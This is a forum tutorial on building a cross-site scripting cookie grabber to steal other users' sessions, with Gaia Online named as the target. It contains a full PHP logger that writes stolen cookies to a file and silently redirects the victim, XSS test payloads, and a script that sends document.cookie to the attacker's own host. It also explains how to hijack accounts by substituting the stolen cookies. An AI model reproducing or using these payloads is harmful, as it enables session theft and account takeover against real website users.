Learningz the basic way to Steal Someones Cookiezz
ok. Well to start off with, a cookie grabber is a mixture of javascript + php. Having a average understanding of how PHP works is probably best, and maybe read up on some tutorials. Ok well here goes.
The PHP Code
Ok.. so basically, the PHP code does not actually "grab" the cookie, it processes the data from the URL. We use javascript go retrieve the cookies the "GET" method to send the data (cookies) to the PHP file.
http;//www.yourwebsite.com/phpfile.php?cookie=THECOOKIEZ
PHP Code:
<?php
$cookie = $_GET['cookie'];
echo $cookie;
?>
If "phpfile" contained that PHP code, then you would see.
"THECOOKIEZ".
while if you were to visit:
http;//www.yourwebsite.com/phpfile.php
Your screen would return blank, as $_GET['cookie'] wasn't found.
ok so now we know how to send data to the PHP file using the GET method. Now we want to save the cookies to a Text File.
So now we will use the fopen function
PHP Code:
$file = fopen('filename.txt', 'a');
fwrite($file , 'Cookie: '.$cookie);
fwrite($file , "\r\n");
fclose($file);
fopen(FILENANE, MODE)
the mode a is for writing only and adds to the end of the file. Which is very handy for what we want to achieve.
PHP Code:
fwrite($file , "Cookie: ".$cookie);
Here we are just Writing the Cookie to the text FIle.
PHP Code:
fwrite($file , "\r\n");
Is a line break.
PHP Code:
fclose($file );
Then we close the file. (important).
So now our code looks like this.
PHP Code:
<?php
$cookie = $_GET['cookie'];
$file = fopen('filename.txt', 'a');
fwrite($file , 'Cookie: '.$cookie);
fwrite($file , "\r\n");
fclose($file);
?>
I got rid of the echo, cause its not needed. Ok... so now when they visit the page:
http;//www.yourwebsite.com/phpfile.php?cookie=THECOOKIEZ
THECOOKIEZ will be added to the Text file... but the screen will stay blank and to them nothing has happened.
So now we are going to ad a redirect. or "header".
PHP Code:
header("Location: http://gaiaonline.com/login.php");
we want to add this to the top of our code.
PHP Code:
<?php
header("Location: http://gaiaonline.com/login.php");
$cookie = $_GET['cookie'];
$file = fopen('filename.txt', 'a');
fwrite($file , 'Cookie: '.$cookie);
fwrite($file , "\r\n");
fclose($file);
?>
Ok thats the PHP file ready to go... so now we are going to actually grab the cookies.
Grabbing the cookies.
NOTE: This is the simplest way to grab cookies and will probably not work on most sites... unless they are cheap and crap.
First you need to find a vulnerability in the site. I'm still kinda new to this, so what I do is look for forms, something that updates... like your profile. Ok.
So now you want to see if they allow javascript
type in.
HTML Code:
<script>alert('1')</script> and submit it. View your profile. If you see a popup saying "1", then the site is vulnerable. For now we will say it has popup up. Next thing you want to try is
document.cookie <-- javascript allows us to grab our cookies from the current site we are viewing.
so now try
HTML Code:
<script>alert(document.cookie)</script>
if you get a popup with your cookie
bingo. You can now attempt to cookie grab.
Now try
PHP Code:
<script>
document.location = 'http;//www.yourwebsite.com/phpfile.php?cookie=' + document.cookie;
</script>
That is the most basic version. There are ways so that the page doesn't redirect, but I will let you guys find that.
so now when someone visits your Profile they will be redirected to your PHP file, then redirected to the URL you specified in the PHP file.
So this happens in about 1-3 seconds depending on your internet speed... could be faster.
You have successfully CGed someone.
What to do with the cookies
You will find that almost NO site, include a
username: Username
password: Password
type cookie. They are hardly ever given to you, I think I've seen it one on a shitty pet site. Most of the time they are encrypted and then md5 hashed...ot Sha1 hashed. Don't bother trying to crack the hash lol or check in rainbow tables... cause most of them are joined data. Like
Time + User + Pass + sessionID
so what we do is exchange our cookies for theirs.
Here is a Firefox addon I use.
mozdev.org - addneditcookies: installation
it allows you to add/edit/delete cookies. Very handy.
Sometimes you dont need to change all the cookies, but yeah, play around untill you find which ones you need.
Few Things To Know
You need to grab the cookies on the SITE you want the cookies for. because another site, cannot access another sits Cookies if that makes sense.
so your host cant access, gaia cookies, thats why you need to grab them on gaia. Common mistake by beginner.
sometimes you will need to bypass filters... search the net for ideas.. or ways to bypass it..
THIS IS VERY BASIC AND DOUBT IT WILL WORK ON MANY SITES.
This tutorial was just to show how they work,
I'm not a professional at Cookie Grabbing, but I figured since peopled asked for the CGer I had for gaiaonline I would make a guide and someone can make it them selves.
THE COOKIE GRABBER ITS SELF IS NOT THE HARD PART!!!!!!!!!!!!!!!!
Finding a vulnerability in the site you want CG is.
well IMO it is.
I hope you learned something today even if it was basic xD
Guide By Kane :O
k[ore]
CGer is the easy part... finding a vulnerable page is the had part.
Linear Mode
